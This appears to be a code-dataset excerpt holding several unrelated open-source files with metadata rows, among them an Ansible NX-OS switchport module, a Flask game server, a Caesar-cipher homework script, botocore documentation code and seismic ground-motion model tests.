If C(mode=trunk), these are the only VLANs that will be
configured on the trunk, i.e. "2-10,15".
aggregate:
description:
- List of Layer-2 interface definitions.
state:
description:
- Manage the state of the Layer-2 Interface configuration.
default: present
choices: ['present','absent', 'unconfigured']
"""
EXAMPLES = """
- name: Ensure Eth1/5 is in its default l2 interface state
nxos_l2_interface:
name: Ethernet1/5
state: unconfigured
- name: Ensure Eth1/5 is configured for access vlan 20
nxos_l2_interface:
name: Ethernet1/5
mode: access
access_vlan: 20
- name: Ensure Eth1/5 only has vlans 5-10 as trunk vlans
nxos_l2_interface:
name: Ethernet1/5
mode: trunk
native_vlan: 10
trunk_vlans: 5-10
- name: Ensure eth1/5 is a trunk port and ensure 2-50 are being tagged (doesn't mean others aren't also being tagged)
nxos_l2_interface:
name: Ethernet1/5
mode: trunk
native_vlan: 10
trunk_vlans: 2-50
- name: Ensure these VLANs are not being tagged on the trunk
nxos_l2_interface:
name: Ethernet1/5
mode: trunk
trunk_vlans: 51-4094
state: absent
- name: Aggregate Configure interfaces for access_vlan with aggregate
nxos_l2_interface:
aggregate:
- { name: "Ethernet1/2", access_vlan: 6 }
- { name: "Ethernet1/7", access_vlan: 15 }
mode: access
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always, except for the platforms that use Netconf transport to manage the device.
type: list
sample:
- interface eth1/5
- switchport access vlan 20
"""
import re
from copy import deepcopy
from ansible.module_utils.network.nxos.nxos import get_config, load_config, run_commands
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec, get_interface_type
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.common.utils import remove_default_spec
def get_interface_mode(name, module):
"""Gets current mode of interface: layer2 or layer3
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class within device.py
interface (string): full name of interface, i.e. Ethernet1/1,
loopback10, port-channel20, vlan20
Returns:
str: 'layer2' or 'layer3'
"""
command = 'show interface {0} | json'.format(name)
intf_type = get_interface_type(name)
mode = 'unknown'
interface_table = {}
try:
body = run_commands(module, [command])[0]
interface_table = body['TABLE_interface']['ROW_interface']
except (KeyError, AttributeError, IndexError):
return mode
if interface_table:
# HACK FOR NOW
if intf_type in ['ethernet', 'portchannel']:
mode = str(interface_table.get('eth_mode', 'layer3'))
if mode in ['access', 'trunk']:
mode = 'layer2'
if mode == 'routed':
mode = 'layer3'
elif intf_type == 'loopback' or intf_type == 'svi':
mode = 'layer3'
return mode
def interface_is_portchannel(name, module):
"""Checks to see if an interface is part of portchannel bundle
Args:
interface (str): full name of interface, i.e. Ethernet1/1
Returns:
True/False based on if interface is a member of a portchannel bundle
"""
intf_type = get_interface_type(name)
if intf_type == 'ethernet':
command = 'show interface {0} | json'.format(name)
try:
body = run_commands(module, [command])[0]
interface_table = body['TABLE_interface']['ROW_interface']
except (KeyError, AttributeError, IndexError):
interface_table = None
if interface_table:
state = interface_table.get('eth_bundle')
if state:
return True
else:
return False
return False
def get_switchport(port, module):
"""Gets current config of L2 switchport
Args:
device (Device): This is the device object of an NX-API enabled device
using the Device class within device.py
port (str): full name of interface, i.e. Ethernet1/1
Returns:
dictionary with k/v pairs for L2 vlan config
"""
command = 'show interface {0} switchport | json'.format(port)
try:
body = run_commands(module, [command])[0]
sp_table = body['TABLE_interface']['ROW_interface']
except (KeyError, AttributeError, IndexError):
sp_table = None
if sp_table:
key_map = {
"interface": "name",
"oper_mode": "mode",
"switchport": "switchport",
"access_vlan": "access_vlan",
"access_vlan_name": "access_vlan_name",
"native_vlan": "native_vlan",
"native_vlan_name": "native_vlan_name",
"trunk_vlans": "trunk_vlans"
}
sp = apply_key_map(key_map, sp_table)
return sp
else:
return {}
def remove_switchport_config_commands(name, existing, proposed, module):
mode = proposed.get('mode')
commands = []
command = None
if mode == 'access':
av_check = existing.get('access_vlan') == proposed.get('access_vlan')
if av_check:
command = 'no switchport access vlan {0}'.format(existing.get('access_vlan'))
commands.append(command)
elif mode == 'trunk':
existing_vlans = existing.get('trunk_vlans_list')
proposed_vlans = proposed.get('trunk_vlans_list')
vlans_to_remove = set(proposed_vlans).intersection(existing_vlans)
if vlans_to_remove:
proposed_allowed_vlans = proposed.get('trunk_allowed_vlans')
remove_trunk_allowed_vlans = proposed.get('trunk_vlans', proposed_allowed_vlans)
command = 'switchport trunk allowed vlan remove {0}'.format(remove_trunk_allowed_vlans)
commands.append(command)
native_check = existing.get('native_vlan') == proposed.get('native_vlan')
if native_check and proposed.get('native_vlan'):
command = 'no switchport trunk native vlan {0}'.format(existing.get('native_vlan'))
commands.append(command)
if commands:
commands.insert(0, 'interface ' + name)
return commands
def get_switchport_config_commands(name, existing, proposed, module):
"""Gets commands required to config a given switchport interface
"""
proposed_mode = proposed.get('mode')
existing_mode = existing.get('mode')
commands = []
command = None
if proposed_mode != existing_mode:
if proposed_mode == 'trunk':
command = 'switchport mode trunk'
elif proposed_mode == 'access':
command = 'switchport mode access'
if command:
commands.append(command)
if proposed_mode == 'access':
av_check = str(existing.get('access_vlan')) == str(proposed.get('access_vlan'))
if not av_check:
command = 'switchport access vlan {0}'.format(proposed.get('access_vlan'))
commands.append(command)
elif proposed_mode == 'trunk':
tv_check = existing.get('trunk_vlans_list') == proposed.get('trunk_vlans_list')
if not tv_check:
if proposed.get('allowed'):
command = 'switchport trunk allowed vlan {0}'.format(proposed.get('trunk_allowed_vlans'))
commands.append(command)
else:
existing_vlans = existing.get('trunk_vlans_list')
proposed_vlans = proposed.get('trunk_vlans_list')
vlans_to_add = set(proposed_vlans).difference(existing_vlans)
if vlans_to_add:
command = 'switchport trunk allowed vlan add {0}'.format(proposed.get('trunk_vlans'))
commands.append(command)
native_check = str(existing.get('native_vlan')) == str(proposed.get('native_vlan'))
if not native_check and proposed.get('native_vlan'):
command = 'switchport trunk native vlan {0}'.format(proposed.get('native_vlan'))
commands.append(command)
if commands:
commands.insert(0, 'interface ' + name)
return commands
def is_switchport_default(existing):
"""Determines if switchport has a default config based on mode
Args:
existing (dict): existing switchport configuration from Ansible mod
Returns:
boolean: True if switchport has OOB Layer 2 config, i.e.
vlan 1 and trunk all and mode is access
"""
c1 = str(existing['access_vlan']) == '1'
c2 = str(existing['native_vlan']) == '1'
c3 = existing['trunk_vlans'] == '1-4094'
c4 = existing['mode'] == 'access'
default = c1 and c2 and c3 and c4
return default
def default_switchport_config(name):
commands = []
commands.append('interface ' + name)
commands.append('switchport mode access')
commands.append('switch access vlan 1')
commands.append('switchport trunk native vlan 1')
commands.append('switchport trunk allowed vlan all')
return commands
def vlan_range_to_list(vlans):
result = []
if vlans:
for part in vlans.split(','):
if part == 'none':
break
if '-' in part:
a, b = part.split('-')
a, b = int(a), int(b)
result.extend(range(a, b + 1))
else:
a = int(part)
result.append(a)
return numerical_sort(result)
return result
def get_list_of_vlans(module):
command = 'show vlan | json'
vlan_list = []
try:
body = run_commands(module, [command])[0]
vlan_table = body['TABLE_vlanbrief']['ROW_vlanbrief']
except (KeyError, AttributeError, IndexError):
return []
if isinstance(vlan_table, list):
for vlan in vlan_table:
vlan_list.append(str(vlan['vlanshowbr-vlanid-utf']))
else:
vlan_list.append('1')
return vlan_list
def numerical_sort(string_int_list):
"""Sorts list of strings/integers that are digits in numerical order.
"""
as_int_list = []
as_str_list = []
for vlan in string_int_list:
as_int_list.append(int(vlan))
as_int_list.sort()
for vlan in as_int_list:
as_str_list.append(str(vlan))
return as_str_list
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
new_dict[new_key] = str(value)
return new_dict
def apply_value_map(value_map, resource):
for key, value in value_map.items():
resource[key] = value[resource.get(key)]
return resource
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def map_params_to_obj(module):
obj = []
aggregate = module.params.get('aggregate')
if aggregate:
for item in aggregate:
for key in item:
if item.get(key) is None:
item[key] = module.params[key]
d = item.copy()
obj.append(d)
else:
obj.append({
'name': module.params['name'],
'mode': module.params['mode'],
'access_vlan': module.params['access_vlan'],
'native_vlan': module.params['native_vlan'],
'trunk_vlans': module.params['trunk_vlans'],
'trunk_allowed_vlans': module.params['trunk_allowed_vlans'],
'state': module.params['state']
})
return obj
def main():
""" main entry point for module execution
"""
element_spec = dict(
name=dict(type='str', aliases=['interface']),
mode=dict(choices=['access', 'trunk']),
access_vlan=dict(type='str'),
native_vlan=dict(type='str'),
trunk_vlans=dict(type='str', aliases=['trunk_add_vlans']),
trunk_allowed_vlans=dict(type='str'),
state=dict(choices=['absent', 'present', 'unconfigured'], default='present')
)
aggregate_spec = deepcopy(element_spec)
# remove default in aggregate spec, to handle common arguments
remove_default_spec(aggregate_spec)
argument_spec = dict(
aggregate=dict(type='list', elements='dict', options=aggregate_spec),
)
argument_spec.update(element_spec)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=[['access_vlan', 'trunk_vlans'],
['access_vlan', 'native_vlan'],
['access_vlan', 'trunk_allowed_vlans']],
supports_check_mode=True)
warnings = list()
commands = []
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
for w in want:
name = w['name']
mode = w['mode']
access_vlan = w['access_vlan']
state = w['state']
trunk_vlans = w['trunk_vlans']
native_vlan = w['native_vlan']
trunk_allowed_vlans = w['trunk_allowed_vlans']
args = dict(name=name, mode=mode, access_vlan=access_vlan,
native_vlan=native_vlan, trunk_vlans=trunk_vlans,
trunk_allowed_vlans=trunk_allowed_vlans)
proposed = dict((k, v) for k, v in args.items() if v is not None)
name = name.lower()
if mode == 'access' and state == 'present' and not access_vlan:
module.fail_json(msg='access_vlan param is required when mode=access && state=present')
if mode == 'trunk' and access_vlan:
module.fail_json(msg='access_vlan param not supported when using mode=trunk')
current_mode = get_interface_mode(name, module)
# Current mode will return layer3, layer2, or unknown
if current_mode == 'unknown' or current_mode == 'layer3':
module.fail_json(msg='Ensure interface is configured to be a L2'
'\nport first before using this module. You can use'
'\nthe nxos_interface module for this.')
if interface_is_portchannel(name, module):
module.fail_json(msg='Cannot change L2 config on physical '
'\nport because it is in a portchannel. '
'\nYou should update the portchannel config.')
# existing will never be null for Eth intfs as there is always a default
existing = get_switchport(name, module)
# Safeguard check
# If there isn't an existing, something is wrong per previous comment
if not existing:
module.fail_json(msg='Make sure you are using the FULL interface name')
if trunk_vlans or trunk_allowed_vlans:
if trunk_vlans:
trunk_vlans_list = vlan_range_to_list(trunk_vlans)
elif trunk_allowed_vlans:
trunk_vlans_list = vlan_range_to_list(trunk_allowed_vlans)
proposed['allowed'] = True
existing_trunks_list = vlan_range_to_list((existing['trunk_vlans']))
existing['trunk_vlans_list'] = existing_trunks_list
proposed['trunk_vlans_list'] = trunk_vlans_list
current_vlans = get_list_of_vlans(module)
if state == 'present':
if access_vlan and access_vlan not in current_vlans:
module.fail_json(msg='You are trying to configure a VLAN'
' on an interface that\ndoes not exist on the '
' switch yet!', vlan=access_vlan)
elif native_vlan and native_vlan not in current_vlans:
module.fail_json(msg='You are trying to configure a VLAN'
' on an interface that\ndoes not exist on the '
' switch yet!', vlan=native_vlan)
else:
command = get_switchport_config_commands(name, existing, proposed, module)
commands.append(command)
elif state == 'unconfigured':
is_default = is_switchport_default(existing)
if not is_default:
command = default_switchport_config(name)
commands.append(command)
elif state == 'absent':
command = remove_switchport_config_commands(name, existing, proposed, module)
commands.append(command)
if trunk_vlans or trunk_allowed_vlans:
existing.pop('trunk_vlans_list')
proposed.pop('trunk_vlans_list')
cmds = flatten_list(commands)
if cmds:
if module.check_mode:
module.exit_json(changed=True, commands=cmds)
else:
result['changed'] = True
load_config(module, cmds)
if 'configure' in cmds:
cmds.pop(0)
result['commands'] = cmds
result['warnings'] = warnings
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 | 1,847,182,583,090,040,300 | 32.1019 | 117 | 0.600751 | false |
HUGG/NGWM2016-modelling-course | Lessons/05-Finite-differences/scripts/solutions/analytical_solutions.py | 2 | 1039 | import numpy as np
import matplotlib.pyplot as plt
import math
def analytical_tr(T0, T1, kappa, t, z):
z = np.array(z) # to make sure it's an array
T = np.zeros(z.size)
for iz in range(z.size):
T[iz] = math.erfc(z[iz] / (2.0 * (kappa * t)**0.5)) * (T0 - T1) + T1
return T
def analytical_ss_qT(z, k, A, z1, q0, z2, T0):
### Calculate the analytical solution of the heat equation
# * Steady-state
# * No advection
# * Constant heat conductivity
# * Constant heat production
#
# Choosable Dirichlet + von Neumann boundary conditions
# T=T0 at z=z1
# q=q0 at z=z2
# k: heat conductivity, W/mK
# A: heat production rate, W/m^3
# z1, q0: location and value of boundary condition one (von neumann)
# z2, T0: location and value of boundary condition two (dirichlet)
# Calculate integration constants
Ca = q0 + A*z1
Cb = -q0 * z2 - A*z1*z2 + k*T0 + 0.5*A*z2**2
### Evaluate temperature at chosen range
T = (- 0.5 * A * z**2 + Ca*z + Cb) / k
return T
| mit | 392,589,402,827,973,440 | 24.975 | 72 | 0.607315 | false |
matteli/histemul | server/src/histemul_server.py | 1 | 4545 | #!/usr/bin/python3
'''
Copyright (c) 2012-2015, Matthieu Nué
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
THE POSSIBILITY OF SUCH DAMAGE.
'''
import datetime
from flask import Flask, request, Response
from bson.objectid import ObjectId
from engine import Engine
try:
import simplejson as json
except ImportError:
try:
import json
except ImportError:
raise ImportError
class MongoJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, (datetime.datetime, datetime.date)):
return obj.isoformat()
elif isinstance(obj, ObjectId):
return str(obj)
return json.JSONEncoder.default(self, obj)
def jsonify(*args):
""" jsonify with support for MongoDB ObjectId
"""
return Response(json.dumps(*args, cls=MongoJsonEncoder), mimetype='application/json')
app = Flask(__name__)
engine = Engine(True, True)
#engine = Engine()
engine.start()
@app.route('/', methods=['GET', 'POST'])
def requesting():
"""
request from client arrive here.
"""
if request.method == 'POST':
if request.is_json:
requestjs = request.get_json()
player = requestjs['player']
typerq = requestjs['type']
print(requestjs)
if typerq == 'get' or typerq == 'get_all':
cls = requestjs['cls']
atts = requestjs['atts']
idd = requestjs['id']
return jsonify(engine.model.get_in_model(typerq, player, cls, atts, idd))
elif typerq == 'get_status' or typerq == 'post_msg':
response = {}
prop = requestjs['prop']
if not engine.update_flag_global.is_set():
if typerq == 'get_status':
response[prop] = 'disabled'
else:
response[prop] = 'rejected'
msg = requestjs['msg']
opt = requestjs['opt']
print(opt)
idd = requestjs['id']
'''if player in engine.model.orders and engine.model.orders[player] and (msg, idd) in engine.model.orders[player][0]:
if type == 'get_status':
response[prop] = 'accepted'
else:
response[prop] = 'rejected'
else:
if type == 'get_status':
result = engine.model.make_orders(player, msg, idd, opt, 'test')
else:
result = engine.model.make_orders(player, msg, idd, opt, 'order')
response[prop] = result'''
return jsonify(engine.model.post_in_model(prop, typerq, player, msg, opt, idd))
elif typerq == 'get_update':
response = {}
prop = requestjs['prop']
num = requestjs['num']
if num == 0:
engine.update_flag_global.wait()
else:
engine.update_flag_tick[num%2].wait()
response[prop] = engine.tick
return jsonify(response)
elif typerq == 'get_in_function':
response = {}
func = requestjs['func']
opts = requestjs['opts']
if func == 'player_person_title':
response = engine.model.get_player_person_title(player, opts)
return jsonify(response)
return jsonify({})
| bsd-2-clause | -5,707,369,261,130,986,000 | 35.645161 | 129 | 0.616197 | false |
gregbdunn/aws-ec2rescue-linux | lib/botocore/docs/client.py | 5 | 4673 | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import inspect
from botocore.docs.utils import get_official_service_name
from botocore.docs.method import document_custom_method
from botocore.docs.method import document_model_driven_method
from botocore.docs.method import get_instance_public_methods
from botocore.docs.sharedexample import document_shared_examples
class ClientDocumenter(object):
def __init__(self, client, shared_examples=None):
self._client = client
self._shared_examples = shared_examples
if self._shared_examples is None:
self._shared_examples = {}
self._service_name = self._client.meta.service_model.service_name
def document_client(self, section):
"""Documents a client and its methods
:param section: The section to write to.
"""
self._add_title(section)
self._add_class_signature(section)
client_methods = get_instance_public_methods(self._client)
self._add_client_intro(section, client_methods)
self._add_client_methods(section, client_methods)
def _add_title(self, section):
section.style.h2('Client')
def _add_client_intro(self, section, client_methods):
section = section.add_new_section('intro')
# Write out the top level description for the client.
official_service_name = get_official_service_name(
self._client.meta.service_model)
section.write(
'A low-level client representing %s' % official_service_name)
# Write out the client example instantiation.
self._add_client_creation_example(section)
# List out all of the possible client methods.
section.style.new_line()
section.write('These are the available methods:')
section.style.new_line()
class_name = self._client.__class__.__name__
for method_name in sorted(client_methods):
section.style.li(':py:meth:`~%s.Client.%s`' % (
class_name, method_name))
def _add_class_signature(self, section):
section.style.start_sphinx_py_class(
class_name='%s.Client' % self._client.__class__.__name__)
def _add_client_creation_example(self, section):
section.style.start_codeblock()
section.style.new_line()
section.write(
'client = session.create_client(\'{service}\')'.format(
service=self._service_name)
)
section.style.end_codeblock()
def _add_client_methods(self, section, client_methods):
section = section.add_new_section('methods')
for method_name in sorted(client_methods):
self._add_client_method(
section, method_name, client_methods[method_name])
def _add_client_method(self, section, method_name, method):
section = section.add_new_section(method_name)
if self._is_custom_method(method_name):
self._add_custom_method(section, method_name, method)
else:
self._add_model_driven_method(section, method_name)
def _is_custom_method(self, method_name):
return method_name not in self._client.meta.method_to_api_mapping
def _add_custom_method(self, section, method_name, method):
document_custom_method(section, method_name, method)
def _add_model_driven_method(self, section, method_name):
service_model = self._client.meta.service_model
operation_name = self._client.meta.method_to_api_mapping[method_name]
operation_model = service_model.operation_model(operation_name)
example_prefix = 'response = client.%s' % method_name
document_model_driven_method(
section, method_name, operation_model,
event_emitter=self._client.meta.events,
method_description=operation_model.documentation,
example_prefix=example_prefix,
)
# Add the shared examples
shared_examples = self._shared_examples.get(operation_name)
if shared_examples:
document_shared_examples(
section, operation_model, example_prefix, shared_examples)
| apache-2.0 | 5,520,618,138,621,459,000 | 40.353982 | 77 | 0.662529 | false |
Reiuiji/Network-Security-Programs | HW code/HW2 Cryptography: Classic Ciphers/CaesarCipher.py | 1 | 1732 | #Dan N
# HW 2: Caesar Cipher Utility
#Dependent: argparse
import os
import sys
import argparse
#input Parser
parser = argparse.ArgumentParser(description='HW 2 Caesar Cipher')
parser.add_argument("-i", "--input", dest='INPUT', help="Input File")
parser.add_argument("-o", "--output", dest='OUTPUT', help="Output File")
parser.add_argument("-b", "--basechar", dest='BASECHAR', help="Base Shift Char")
parser.add_argument("-s", "--shiftchar", dest='SHIFTCHAR', help="Shifted Char")
parser.add_argument("-l", "--loopmode", dest='LOOP', help="Enable Caesar Loop", action='store_true')
args = parser.parse_args()
if not args.BASECHAR:
args.BASECHAR = raw_input("Base Character: ")
if not args.SHIFTCHAR:
args.SHIFTCHAR = raw_input("Shift Character: ")
if not args.INPUT:
INPUT = raw_input("Message: ")
else:
if os.path.isfile(args.INPUT):
f = open(args.INPUT, 'r')
INPUT = f.read()
f.close()
else:
print("Input File Does not Exist")
sys.exit()
if args.LOOP:
LOOP = args.LOOP
else:
LOOP = False
def CaesarCipher(PlainText,Shift):
CipherText = ""
for Char in PlainText:
if Char.isalpha():
A = ord(Char) + Shift
if Char.islower():
if A > ord('z'):
A -= 26
else:
if A > ord('Z'):
A -= 26
CipherText += chr(A)
else:
CipherText += Char
return CipherText
#Calculate the shift
Shift=ord(args.SHIFTCHAR.lower()) - ord(args.BASECHAR.lower())
if Shift < 0:
Shift += 26
elif Shift > 26:
Shift -= 26
if LOOP == False:
CaesarOutput = CaesarCipher(INPUT, Shift)
#Write Output
if not args.OUTPUT:
print(CaesarOutput)
else:
f = open('output.txt', 'w')
f.write(CaesarOutput)
f.close()
else:
for a in range(26):
CaesarOutput = CaesarCipher(INPUT, a)
print(CaesarOutput)
| mit | -7,607,492,792,445,671,000 | 22.093333 | 100 | 0.667436 | false |
pescobar/easybuild-easyblocks | easybuild/easyblocks/j/java.py | 1 | 2662 | ##
# Copyright 2012-2019 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBlock for installing Java, implemented as an easyblock
@author: Jens Timmerman (Ghent University)
@author: Kenneth Hoste (Ghent University)
"""
import os
import stat
from distutils.version import LooseVersion
from easybuild.easyblocks.generic.packedbinary import PackedBinary
from easybuild.tools.filetools import adjust_permissions, change_dir, copy_dir, copy_file, remove_dir
from easybuild.tools.run import run_cmd
class EB_Java(PackedBinary):
"""Support for installing Java as a packed binary file (.tar.gz)
Use the PackedBinary easyblock and set some extra paths.
"""
def extract_step(self):
"""Unpack the source"""
if LooseVersion(self.version) < LooseVersion('1.7'):
copy_file(self.src[0]['path'], self.builddir)
adjust_permissions(os.path.join(self.builddir, self.src[0]['name']), stat.S_IXUSR, add=True)
change_dir(self.builddir)
run_cmd(os.path.join(self.builddir, self.src[0]['name']), log_all=True, simple=True, inp='')
else:
PackedBinary.extract_step(self)
def install_step(self):
if LooseVersion(self.version) < LooseVersion('1.7'):
remove_dir(self.installdir)
copy_dir(os.path.join(self.builddir, 'jdk%s' % self.version), self.installdir)
else:
PackedBinary.install_step(self)
def make_module_extra(self):
"""
Set JAVA_HOME to install dir
"""
txt = PackedBinary.make_module_extra(self)
txt += self.module_generator.set_environment('JAVA_HOME', self.installdir)
return txt
| gpl-2.0 | 5,134,567,485,933,697,000 | 36.492958 | 104 | 0.697596 | false |
frodo4fingers/swico | dominant_colour.py | 1 | 1649 | # import Image
import sys
def average_colour(image):
colour_tuple = [None, None, None]
for channel in range(3):
# Get data for one channel at a time
pixels = image.getdata(band=channel)
values = []
for pixel in pixels:
values.append(pixel)
colour_tuple[channel] = sum(values) / len(values)
return tuple([int(i) for i in colour_tuple])
def most_frequent_colour(image):
w, h = image.size
pixels = image.getcolors(w * h)
most_frequent_pixel = pixels[0]
for count, colour in pixels:
if count > most_frequent_pixel[0]:
most_frequent_pixel = (count, colour)
return most_frequent_pixel[1]
def average_colour_in_k_clusters(image, k):
pass
def compare(title, image, colour_tuple):
image.show(title=title)
image = Image.new("RGB", (200, 200,), colour_tuple)
return image
def kmeans(pixels, k):
numFeatures = len(pixels)
centroids = getRandomCentroids(numFeatures, k)
iterations = 0
oldCentroids = None
while not shouldStop(oldCentroids, centroids, iterations):
oldCentroids = centroids
interations += 1
def save(name, result, image):
image.save("images/results/{}.jpg".format(name))
sample = Image.new("RGB", (200, 200,), result)
sample.save("images/results/{}-result.jpg".format(name))
def main():
image = Image.open("images/DSC_6883.jpg")
if "mode" in sys.argv:
result = most_frequent_colour(image)
if "ave" in sys.argv:
result = average_colour(image)
save("Wheatbelt", result, image)
if __name__ == "__main__":
main()
| mit | 7,902,813,109,505,295,000 | 19.358025 | 62 | 0.622802 | false |
gem/oq-engine | openquake/hazardlib/tests/gsim/si_midorikawa_1999_test.py | 1 | 4478 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright (C) 2013-2021 GEM Foundation
#
# OpenQuake is free software: you can redistribute it and/or modify it
# under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OpenQuake is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>.
from openquake.hazardlib.gsim.si_midorikawa_1999 import SiMidorikawa1999Asc, \
SiMidorikawa1999SInter, SiMidorikawa1999SSlab, \
SiMidorikawa1999SInterNorthEastCorrection, \
SiMidorikawa1999SSlabNorthEastCorrection, \
SiMidorikawa1999SInterSouthWestCorrection, \
SiMidorikawa1999SSlabSouthWestCorrection
from openquake.hazardlib.tests.gsim.utils import BaseGSIMTestCase
# test data was generated using alternative implementation of GMPE.
class SiMidorikawa1999AscTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999Asc
def test_mean(self):
self.check('SM99/SM99ASC_MEAN.csv', max_discrep_percentage=0.1)
def test_mean_pga(self):
self.check('SM99/SM99ASC_MEAN_PGA.csv', max_discrep_percentage=0.1)
def test_mean_pga_vs800(self):
self.check('SM99/SM99ASC_MEAN_PGA_vs800.csv', max_discrep_percentage=0.1)
def test_total_stddev(self):
self.check('SM99/SM99ASC_STD_TOTAL.csv', max_discrep_percentage=0.1)
class SiMidorikawa1999SInterTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SInter
def test_mean(self):
self.check('SM99/SM99SInter_MEAN.csv', max_discrep_percentage=0.1)
def test_total_stddev(self):
self.check('SM99/SM99SInter_STD_TOTAL.csv', max_discrep_percentage=0.1)
class SiMidorikawa1999SInterNECorrTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SInterNorthEastCorrection
def test_mean(self):
self.check(
'SM99/SM99SInterNECorr_MEAN.csv', max_discrep_percentage=0.1
)
def test_mean_pga(self):
self.check(
'SM99/SM99SInterNECorr_MEAN_PGA.csv', max_discrep_percentage=0.1
)
def test_total_stddev(self):
self.check(
'SM99/SM99SInterNECorr_STD_TOTAL.csv', max_discrep_percentage=0.1
)
class SiMidorikawa1999SInterSWCorrTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SInterSouthWestCorrection
def test_mean(self):
self.check(
'SM99/SM99SInterSWCorr_MEAN.csv', max_discrep_percentage=0.1
)
def test_mean_pga(self):
self.check(
'SM99/SM99SInterSWCorr_MEAN_PGA.csv', max_discrep_percentage=0.1
)
def test_total_stddev(self):
self.check(
'SM99/SM99SInterSWCorr_STD_TOTAL.csv', max_discrep_percentage=0.1
)
class SiMidorikawa1999SSlabTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SSlab
def test_mean(self):
self.check('SM99/SM99SSlab_MEAN.csv', max_discrep_percentage=0.1)
def test_total_stddev(self):
self.check('SM99/SM99SSlab_STD_TOTAL.csv', max_discrep_percentage=0.1)
class SiMidorikawa1999SSlabNECorrTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SSlabNorthEastCorrection
def test_mean(self):
self.check(
'SM99/SM99SSlabNECorr_MEAN.csv', max_discrep_percentage=0.1
)
def test_mean_pga(self):
self.check(
'SM99/SM99SSlabNECorr_MEAN_PGA.csv', max_discrep_percentage=0.1
)
def test_total_stddev(self):
self.check(
'SM99/SM99SSlabNECorr_STD_TOTAL.csv', max_discrep_percentage=0.1
)
class SiMidorikawa1999SSlabSWCorrTestCase(BaseGSIMTestCase):
GSIM_CLASS = SiMidorikawa1999SSlabSouthWestCorrection
def test_mean(self):
self.check(
'SM99/SM99SSlabSWCorr_MEAN.csv', max_discrep_percentage=0.1
)
def test_mean_pga(self):
self.check(
'SM99/SM99SSlabSWCorr_MEAN_PGA.csv', max_discrep_percentage=0.1
)
def test_total_stddev(self):
self.check(
'SM99/SM99SSlabSWCorr_STD_TOTAL.csv', max_discrep_percentage=0.1
)
| agpl-3.0 | 553,797,299,080,955,140 | 31.215827 | 81 | 0.700313 | false |
markbrough/exchangerates | exchangerates/__init__.py | 1 | 3564 | from bisect import bisect_left
import csv
import datetime
import pkg_resources
from six import next
from . import get_rates
class UnknownCurrencyException(Exception):
pass
def make_date_from_iso(iso_str):
year = int(iso_str[:4])
